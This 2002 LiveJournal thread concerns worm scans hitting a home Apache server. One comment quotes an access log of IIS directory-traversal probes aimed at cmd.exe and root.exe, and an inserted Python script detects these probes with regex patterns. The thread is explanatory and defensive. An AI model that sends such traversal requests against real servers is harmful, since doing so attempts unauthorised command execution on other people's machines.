bluebeard: holy crap, a face pic (Default)
[personal profile] bluebeard
tonight I set up apache-win32 so I could test some stuff without having to ssh into my brother's box. being stupid, I didn't tell it right off the bat not to accept non-local connections.

within an hour three different people tried to use IIS exploits to get at my c: drive. of course, since it's apache, whatever lame little scripts they're running didn't work.

are people -that- fucking bored?

after a glorious week of sleeping midnight-~8am, here I am, not able to sleep again. wheee

(no subject)

Date: 2002-07-04 10:55 pm (UTC)
From: [identity profile] abiku.livejournal.com
It's very likely that it wasn't "people" probing your computer, but the Code Red virus, or variants thereof -- they automatically scan neighboring netblocks and my weblogs are chock full of them. Here's an example of a single scan from one infected computer:

63.228.51.121 - - [22/Sep/2001:22:20:06 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:06 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
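
As an added example (not part of the original post or comment), a small Python script that picks probes like these out of an Apache combined-format access log and groups them by source address; several probes from one address within a few seconds point to an automated scanner rather than a person. The function names, the burst thresholds and the benign sample line are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: three requests reused from the log quoted above, plus one benign line.
SAMPLE = '''\
63.228.51.121 - - [22/Sep/2001:22:20:06 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:07 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
63.228.51.121 - - [22/Sep/2001:22:20:08 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
192.0.2.10 - - [22/Sep/2001:22:21:00 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
'''

# Fields: client address, timestamp, method, request path, status code.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Requests aimed at an IIS command shell (root.exe / cmd.exe), usually behind
# an encoded "../" such as %255c, %c0%af or %c1%1c, as in the quoted log.
PROBE = re.compile(r'/(?:root|cmd)\.exe\?', re.I)
ENCODED_DOTDOT = re.compile(r'\.\.%[0-9a-f%]{2,}', re.I)

def classify(path):
    """Return the probe type for a request path, or None for ordinary traffic."""
    if not PROBE.search(path):
        return None
    return "encoded-traversal" if ENCODED_DOTDOT.search(path) else "direct-shell"

def summarize(log_text, burst_seconds=10, burst_min=3):
    """Group IIS shell probes by source; flag tight bursts as automated scanning."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        kind = classify(m.group(4)) if m else None
        if kind:
            when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            hits[m.group(1)].append((when, kind, int(m.group(5))))
    report = {}
    for ip, rows in hits.items():
        rows.sort()
        span = (rows[-1][0] - rows[0][0]).total_seconds()
        report[ip] = {
            "probes": len(rows),
            "kinds": sorted({k for _, k, _ in rows}),
            "any_success": any(s < 400 for _, _, s in rows),  # worth a closer look
            "automated": len(rows) >= burst_min and span <= burst_seconds,
        }
    return report

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE).items():
        print(ip, info)
```

On a server that is not IIS every probe should show a 4xx status, so `any_success` staying false confirms the requests found nothing.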

(no subject)

Date: 2002-07-05 12:34 am (UTC)
From: [identity profile] dom-ino.livejournal.com
As a matter of fact, that could very well be a copy of part of my access.log.

I have been educated. ;)
